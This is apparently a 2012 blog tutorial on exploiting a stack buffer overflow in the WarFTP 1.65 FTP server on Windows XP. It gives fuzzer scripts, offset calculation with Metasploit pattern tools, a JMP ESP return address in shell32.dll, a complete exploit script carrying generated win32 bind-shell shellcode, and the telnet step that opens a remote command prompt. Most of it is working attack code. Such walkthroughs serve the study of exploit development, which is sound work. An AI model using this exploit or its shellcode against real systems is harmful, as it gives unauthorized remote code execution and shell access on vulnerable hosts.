Tuesday, 18 September 2012

Buffer Overflow WarFTP 1.65

Posted at 00:47
In this post I will walk through a stack buffer overflow, with WarFTP 1.65 as the target.
The tools needed are:

  • OllyDbg 1.10
  • WarFTP 1.65
  • Windows XP Service Pack 2 or 3
  • BackTrack
First, install OllyDbg and WarFTP on the Windows machine. Then write a fuzzer for WarFTP. The fuzzer code looks like this:

#!/usr/bin/python
import socket

# Crash test: 1000 bytes of "A" (0x41) sent as the FTP user name.
# Byte literals keep the script working on both Python 2 and 3.
buffer = b"\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.129', 2222))
data = s.recv(1024)                  # read the banner before sending commands
print("Sending data to WarFTP...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")

Save it as fuzzer.py.
Change the IP address and port to match your setup. WarFTP's default port is 21; I am using 2222 because port 21 is already in use on my machine.
Now run the fuzzer from BackTrack. It first has to be made executable:
chmod +x fuzzer.py

./fuzzer.py
Switch back to Windows and look at WarFTP. Did it crash? If so, the fuzzer works.
Now check it in OllyDbg: close WarFTP and start it again, then in OllyDbg open File->Attach, select WarFTP and press Play (F9). Run the fuzzer again and look at the registers panel on the right: EIP has been overwritten with 41414141, the "A"s we sent. Controlling EIP means we control where execution resumes after the function returns, so the overflow is very likely exploitable.


Next we need to know which bytes of the buffer end up in EIP. The easy way is Metasploit's pattern_create, which generates a string in which every 4-byte window is unique. Change into the Metasploit tools directory:
cd /pentest/exploits/framework/tools
Create a 1000-byte pattern and save it to pattern.txt:
./pattern_create.rb 1000 > pattern.txt
Open pattern.txt, copy the pattern into the fuzzer in place of the "A"s, and edit the fuzzer so it looks like this:

#!/usr/bin/python
import socket

# The "A"s are replaced with the unique pattern from pattern_create.rb 1000,
# so the bytes that land in EIP and at ESP can be mapped back to an offset.
buffer = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.129', 2222))
data = s.recv(1024)                  # banner
print("Sending data to WarFTP...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")
Back in Windows, restart WarFTP, attach OllyDbg again and run the fuzzer from BackTrack. In OllyDbg, EIP now holds 32714131 (the pattern bytes "1Aq2" read as a little-endian dword), and ESP points into the pattern at the string "q4Aq5Aq...".

Now find the offsets of those bytes in the pattern with pattern_offset, another Metasploit tool:
cd /pentest/exploits/framework/tools
Give it the EIP value from OllyDbg, 32714131:
./pattern_offset.rb 32714131
It returns 485.
Give it the string ESP points to:
./pattern_offset.rb q4Aq5Aq
It returns 493.
So the 4 bytes at offset 485 overwrite the saved return address, and after the crash ESP points at offset 493, 8 bytes past the start of the EIP bytes.
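To make the two numbers above reproducible without the Metasploit scripts, here is an added example (my own code, not Metasploit's pattern_create.rb or pattern_offset.rb) that builds the same cyclic pattern from the same upper/lower/digit character sets and locates a value in it. It handles the two forms of input used above: a substring copied from the stack, and an 8-hex-digit register value such as EIP, which has to be byte-swapped from little-endian before it is searched for. The default length of 1000 matches the pattern used in the fuzzer.

```python
import re
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length=1000):
    """Cyclic pattern Aa0Aa1...Zz9 (every 4-byte window unique), cut to `length` bytes."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length exceeds the 20280-byte unique pattern")


def pattern_offset(pattern, value):
    """Offset of `value` in `pattern`, or -1.

    `value` is either a string copied from the debugger (e.g. the bytes at ESP)
    or an 8-hex-digit dword such as EIP; a dword is converted to the 4 pattern
    bytes it was read from (x86 is little-endian, so 32714131 -> b"1Aq2").
    """
    if re.match(r"^(0x)?[0-9a-fA-F]{8}$", value):
        needle = struct.pack("<I", int(value, 16))
    else:
        needle = value.encode("ascii")
    return pattern.find(needle)


def eip_esp_gap(pattern, eip_value, esp_string):
    """Distance in bytes from the EIP overwrite to the data ESP points at."""
    return pattern_offset(pattern, esp_string) - pattern_offset(pattern, eip_value)


if __name__ == "__main__":
    p = pattern_create(1000)
    print("EIP 32714131 is at offset", pattern_offset(p, "32714131"))
    print("ESP string q4Aq5Aq is at offset", pattern_offset(p, "q4Aq5Aq"))
    print("bytes from EIP to ESP data:", eip_esp_gap(p, "32714131", "q4Aq5Aq"))
```

Because the whole dword is looked up rather than a single byte, an off-by-one in the filler count shows up as an offset shifted by one or as -1, which is the usual sign that the bytes in EIP were not a clean 4-byte slice of the pattern.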
Next I will overwrite EIP with DEADBEEF. x86 stores a dword least-significant byte first, so in little-endian order that is \xEF\xBE\xAD\xDE.
DEADBEEF is a handy marker because it is made only of the hex letters A to F: it stands out immediately in the register window, and if EIP reads exactly DEADBEEF the 4 bytes at offset 485 are confirmed as the return address.
Edit your fuzzer:
#!/usr/bin/python
import socket

# nilaiEIP ("EIP value"): 485 bytes of filler, then the 4 bytes that
# overwrite EIP. 0xDEADBEEF is sent least-significant byte first.
nilaiEIP = b"\x41" * 485
nilaiEIP += b"\xEF\xBE\xAD\xDE"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.129', 2222))
data = s.recv(1024)                  # banner
print("Sending data to WarFTP...")
s.send(b'USER ' + nilaiEIP + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")
Restart WarFTP, attach OllyDbg and run the fuzzer.
Look at OllyDbg: EIP has been overwritten with DEADBEEF, so we control the return address exactly.
Now I will fill the stack after the return address with \xCC (INT3 breakpoints), which makes it easy to see in the debugger where the bytes after EIP land relative to ESP. Edit your fuzzer:
#!/usr/bin/python
import socket

buffer = b"\x90" * 485                      # filler up to the saved return address
buffer += b"\xEF\xBE\xAD\xDE"               # EIP marker (DEADBEEF, little-endian)
buffer += b"\x90" * (493 - len(buffer))     # NOPs up to where ESP points (offset 493)
buffer += b"\xCC" * (1000 - len(buffer))    # INT3 breakpoints from ESP onward

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.129', 2222))
data = s.recv(1024)                  # banner
print("Sending data to WarFTP...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")
Next we need a JMP ESP instruction in one of the DLLs WarFTP has loaded, and its address.
Why? After the crash ESP points into our buffer (offset 493). If EIP is set to the address of a JMP ESP, execution jumps straight into the bytes we placed there, which is where the backdoor/payload will go.
Restart WarFTP, attach OllyDbg and open View->Executable Modules, then double-click shell32.dll. In the CPU window for shell32.dll, right-click, choose Search For->Command, type jmp esp (without quotes) and search. Note the address of the instruction; in my case it is 7CB3DDEE. It may be different on your machine, since it depends on the Windows version and service pack, so look it up rather than copying mine. Windows XP has no ASLR, so once found the address stays the same across restarts of that build.
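The DEADBEEF, INT3 and JMP ESP steps above all check the same thing: that the buffer is laid out so the return address is hit exactly and JMP ESP lands on our bytes. As an added example (my own code, not the original script), this builds the final USER buffer from the two measured offsets and the JMP ESP address, does the little-endian conversion with struct.pack instead of by hand, and verifies the layout before anything is sent: the return address sits at offset 485, ESP (offset 493) lands in the NOP sled ahead of the shellcode, and neither the address nor the shellcode contains NUL, CR or LF, which would cut the FTP command short. The INT3 placeholder shellcode, host and port are assumptions for the example; the real run uses the generated bind-shell bytes.

```python
import socket
import struct

EIP_OFFSET = 485        # offset of the 4 bytes that land in EIP (pattern_offset 32714131)
ESP_OFFSET = 493        # offset of the bytes ESP points to after the crash (pattern_offset q4Aq5Aq)
JMP_ESP = 0x7CB3DDEE    # JMP ESP in shell32.dll on the author's XP box; look yours up in OllyDbg
BAD_CHARS = b"\x00\x0a\x0d"   # NUL ends a C string, CR/LF end an FTP command line
NOP = b"\x90"


def build_buffer(shellcode, ret=JMP_ESP, sled=32):
    """USER argument: filler up to EIP | ret (little-endian) | NOP sled | shellcode."""
    buf = NOP * EIP_OFFSET
    buf += struct.pack("<I", ret)    # 0x7CB3DDEE -> b"\xEE\xDD\xB3\x7C"
    buf += NOP * sled
    buf += shellcode
    return buf


def check_layout(buf, shellcode, ret=JMP_ESP):
    """Return a list of layout problems; an empty list means the buffer is consistent."""
    problems = []
    ret_bytes = struct.pack("<I", ret)
    if buf[EIP_OFFSET:EIP_OFFSET + 4] != ret_bytes:
        problems.append("return address is not at offset %d" % EIP_OFFSET)
    if set(ret_bytes) & set(BAD_CHARS):
        problems.append("return address contains a bad character")
    sc_start = buf.find(shellcode)
    if sc_start < 0:
        problems.append("shellcode not present in buffer")
    elif sc_start < ESP_OFFSET:
        problems.append("shellcode starts before ESP; JMP ESP would skip its first bytes")
    elif buf[ESP_OFFSET:sc_start] != NOP * (sc_start - ESP_OFFSET):
        problems.append("bytes between ESP and the shellcode are not all NOPs")
    bad = sorted(set(shellcode) & set(BAD_CHARS))
    if bad:
        problems.append("shellcode contains bad characters: %r" % bad)
    return problems


def send_exploit(host, port, buf):
    """Replay the page's FTP exchange: banner, USER <buf>, PASS. The server dies on USER."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)
    s.send(b"USER " + buf + b"\r\n")
    try:
        s.recv(1024)
        s.send(b"PASS PASSWORD\r\n")
    except socket.error:
        pass        # expected once the server has crashed into our payload
    s.close()


if __name__ == "__main__":
    # Constructed placeholder: INT3s break into OllyDbg if JMP ESP reaches the sled.
    # Replace with the generated bind-shell bytes for the real run.
    sc = b"\xCC" * 16
    buf = build_buffer(sc)
    problems = check_layout(buf, sc)
    if problems:
        raise SystemExit("\n".join(problems))
    send_exploit("192.168.43.129", 2222, buf)   # assumed lab address and port
```

Run it once with OllyDbg attached and the placeholder: a break at an INT3 inside the sled proves the JMP ESP address is right before any real payload is involved. Shortening the sled below 4 bytes makes check_layout complain, because the shellcode would then start before offset 493 and JMP ESP would land in the middle of it.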

Now open a console and start the Metasploit 2 web interface:
cd /pentest/exploits/framework2/
./msfweb
Open a browser at http://127.0.0.1:55555.
Select Payloads, filter on OS: win32 and pick the Bind Shell payload.
Set the payload options (the bind port is 4444, which is the port we connect to at the end) and click Generate Payload.
Copy the generated payload into the fuzzer, so it looks like this:

#!/usr/bin/python
import socket

buffer = b"\x90" * 485                  # filler up to the saved return address
#buffer += b"\xED\x1E\x94\x7C"          # alternative JMP ESP address, left disabled
buffer += b"\xEE\xDD\xB3\x7C"           # 0x7CB3DDEE: JMP ESP in shell32.dll, little-endian
buffer += b"\x90" * 32                  # NOP sled; ESP (offset 493) lands inside it
# win32 bind shell on port 4444, generated by msfweb
buffer += (b"\x29\xc9\xb1\x51\xd9\xeb\xd9\x74\x24\xf4\x5a\xbb\x66\xa8\xc8\x21"
b"\x31\x5a\x13\x83\xea\xfc\x03\x3c\xa7\x2a\xd4\x3c\xdd\x41\x5a\x54"
b"\xdb\x69\x9a\x5b\x7c\x1d\x09\x87\x59\xaa\x97\xfb\x2a\xd0\x12\x7b"
b"\x2c\xc6\x96\x34\x36\x93\xf6\xea\x47\x48\x41\x61\x73\x05\x53\x9b"
b"\x4d\xd9\xcd\xcf\x2a\x19\x99\x08\xf2\x50\x6f\x17\x36\x8f\x84\x2c"
b"\xe2\x74\x4d\x27\xef\xfe\xd2\xe3\xee\xeb\x8b\x60\xfc\xa0\xd8\x29"
b"\xe1\x37\x34\xd6\x35\xb3\x43\xb4\x61\xdf\x32\x87\x5b\x04\xd0\x8c"
b"\xdf\x8a\x92\xd2\xd3\x61\xd4\xce\x46\xfe\x55\xe6\xc6\x69\xd8\xb8"
b"\xf8\x85\xb4\xbb\xd3\x30\x66\x25\xb4\x8f\xba\xc1\x33\x83\x88\x4e"
b"\xe8\x9c\x3d\x18\xdb\x8e\x42\xe3\x8b\xaf\x6d\x4c\xa5\xb5\xf4\xf3"
b"\x58\x3d\xfb\xa6\xc8\x3c\x04\x98\x65\x98\xf3\xed\xdb\x4d\xfb\xdb"
b"\x77\x21\x50\xb0\x24\x86\x05\x75\x98\xf7\x7a\x1f\x76\x19\x27\xb9"
b"\xd5\x90\x36\xd0\xb2\x06\xa2\xaa\x85\x10\x2c\x9c\x60\x8f\x83\x75"
b"\x8a\x7f\x4b\xd1\xd9\xae\x65\x4e\xdd\x79\x26\x25\xde\x56\xa1\x20"
b"\x69\xd1\x7b\xfd\x95\x0b\x2b\x55\x3e\xe1\x33\x85\x2d\x61\x2b\x5c"
b"\x94\x0b\xe4\x61\xce\xb9\xf5\x4d\x89\x2b\x6e\x0b\x3e\xcf\x03\x5a"
b"\x5b\x65\x8c\x05\x8d\xb6\xa5\x52\xa7\x02\x3f\x7e\x09\x4b\xcc\xd4"
b"\x94\x09\x1e\xd6\x2b\xa2\xf3\xab\xd6\x82\x58\x18\x8d\x9b\xec\xa0"
b"\x61\x4d\xee\x29\xc2\x8d\xc6\x8a\x9d\x23\xb6\x7d\x73\xae\x39\x2c"
b"\x22\x7b\x6b\x31\x14\xeb\x26\x14\x90\x22\x6b\x59\x4d\xd0\x73\x5a"
b"\x45\xda\x5c\x2f\xfd\xd8\xde\xeb\x66\xde\x37\xa1\x99\xf0\xd0\x3b"
b"\xbe\x13\x53\x90\xc1\x02\x6b\xc6")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.129', 2222))
data = s.recv(1024)                  # banner
print("Sending data to WarFTP...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")
Restart WarFTP, this time without OllyDbg attached, and run the exploit.
Finally, connect to the bind shell on the target's port 4444 with telnet or netcat:
telnet 192.168.43.129 4444
If it worked, you are dropped into a Windows command prompt.
